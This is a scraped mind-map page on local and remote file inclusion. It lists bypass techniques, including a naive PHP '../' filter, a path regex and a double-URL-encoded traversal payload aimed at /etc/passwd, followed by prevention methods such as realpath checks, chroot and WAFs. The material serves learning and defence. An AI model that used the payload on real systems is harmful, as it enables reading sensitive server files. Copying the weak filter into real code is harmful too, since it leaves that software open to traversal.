Please enable JavaScript.
Coggle requires JavaScript to display documents.
File inclusion (LFI ,RFI) - Coggle Diagram
File inclusion (LFI ,RFI)
-
-
LFI Bypass Techniques
Path traversal filters
The php filter : $language = str_replace('../', '', $_GET['language']);
-
-
Approved paths
exemple regex : if(preg_match('/^.\/languages\/.+$/', $_GET['language'])) {
-
-
Double encoding
-
Double encoded : %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%65%74%63%252f%70%61%73%73%77%64
Prevention methods
-
- Path Traversal Prevention
Using Realpath: Resolve the file path using functions like realpath() and ensure it is within the expected directory.
Chroot Jail: Limit the application to a specific directory with a chroot jail to prevent access to the outside.
- File Inclusion Restrictions
-
Restrict External Sources: Prevent including files from external sources. Especially, do not allow URL-based file inclusions.
- File Permissions and Security
File Permissions: Ensure that only files with the necessary permissions are included. Set file permissions using chmod and use the minimum required permissions.
File Ownership: Check file ownership and group ownership, and ensure that only authorized users have access to files.
- Code Review and Security Testing
-
Penetration Testing: Conduct regular penetration tests to identify and fix file inclusion vulnerabilities.
- Firewalls and WAF (Web Application Firewall)
-
-